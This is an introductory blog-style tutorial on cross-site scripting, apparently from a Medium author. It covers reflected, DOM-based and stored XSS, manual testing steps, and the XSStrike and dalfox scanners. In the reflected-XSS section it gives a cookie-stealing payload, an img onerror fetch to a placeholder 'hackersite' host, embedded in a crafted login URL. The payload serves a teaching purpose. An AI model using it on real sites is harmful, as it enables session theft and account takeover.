XSS

1 month ago 29
BOOK THIS SPACE FOR AD
ARTICLE AD

Majd abuleil

Cross-site scripting (XSS) is a type of security vulnerability that allows an attacker to inject malicious scripts into a website, which are then executed by the user’s browser. This can lead to a range of malicious activities, including stealing sensitive information, taking control of the user’s session, or performing unauthorized actions on the user’s behalf.

There are 3 types of Cross-site Scripting (XSS):

1- Reflected XSS => There are two types of reflected XSS the self-reflected XSS or the one where the attacker sends a malicious link to the user, who then executes the XSS on their browser and account.

Example-1: </script>alert(hi)</script> → This code is the basic to check for self XSS on a site.

Example-2: <img src=”x” onerror=fetch(“http://hackersite/aylod?cookie=”+document.cookie); /> →

this one as we see the hacker can send this to a user with the link like:

https://example.com/account/login?d=<img src=”x” onerror=fetch(“http://hackersite/paylod?cookie=”+document.cookie); />

When the user clicks on this link will send the user cookie to the hacker who will use it to login to the user account.

2- DOM-Based XSS => DOM-Based XSS is a type of attack where the attacker manipulates the way a website’s code runs on your browser, without modifying the website itself. This causes the code to behave unexpectedly, allowing the attacker to execute malicious code.

DOM XSS vulnerabilities are primarily attributed to situations where user-controllable sources pass data to sinks, such as:

eval()document.writeinnerHTML

These sinks enable dynamic code execution. To identify potential vulnerabilities, look for user-controllable sources, including:

document.URLdocument.referrerlocationlocation.hreflocation.searchlocation.hash

Knowing where data comes from and goes in your website’s code is key to identifying security weaknesses. By understanding these sources and sinks, you can better identify and mitigate DOM-Based XSS vulnerabilities in your web application

3-Stored XSS => Stored Cross-Site Scripting (XSS) is a type of security vulnerability that occurs when an attacker injects malicious code into a web application’s database, such as in a message forum, visitor log, or comment field. This malicious script is permanently stored on the target server, and when a victim requests the stored information, the script is retrieved and executed by the application. This type of attack is also referred to as Persistent XSS, as the malicious code remains on the server until it is removed or patched.

Example-1: On the website, there is a comment section that attackers well use the comment like this:

1- the attacker will type a malicious code in the comment section and submit this comment.

2- the comment or his malicious code will be saved in the database of the comment section of the website.

3- the user logs in to his account and goes to the blog where this malicious code has been saved and submitted.

4- the malicious code will be executed after the user is inside the blog and in the comment section where the code is saved, allowing the attacker to steal their session cookies or take control of their accounts depending on the code.

Tools & Techniques for Detecting XSS

Manual

I will break this into steps:

1- after choosing a website the first thing to do is take about 10 to 15 minutes to see how the website or the app is working and if there are places where you can test for the XSS vulnerability. [let’s say there is a search bar on the site where you can search for anything and you choose to test this for XSS]

2- you can type anything there like [ TEST ] and there is no result but when you see the source code you will see your word [ TEST ] is in the source code.

If the word you type which the website didn’t find any result, but you find in the source code there is a possibility of 90% that this site is Vurlnabile to XSS

3- you can try to break and type a code that fits the source code and works OR in this step, you can try to use an Automatic tool.

[here also you can use BurpSuite Like Repeater to see how the website acts and responds to your XSS code]

Automatic

There are a lot of tools that scan for XSS and give you the Payload BUT most of the time these tools give a False Positive

Tools ==>

1- XSStrike: https://github.com/s0md3v/XSStrike

XSStrike is a tool designed to detect Cross-Site Scripting (XSS) vulnerabilities. It analyzes a website’s response to different inputs and generates specific payloads that are more likely to exploit the vulnerabilities found, increasing the chances of successful XSS detection0.

2-dalfox: https://github.com/hahwul/dalfox

Dalfox is a tool for finding XSS vulnerabilities. It provides various features such as single URL scanning, massive scanning, REST API server mode, and output customization.
Dalfox can:

Scan a single websiteScan many websites at onceStart a special server for scanningLet you customize the scan results.

Dalfox Modes:
Dalfox has 5 ways to work

url: Scan one websitepipe: Use a special pipeline modefile: Scan a list of websites or raw datasxss: Find a special type of XSS weaknessserver: Start a special server for scanning

CyberViperX

Read Entire Article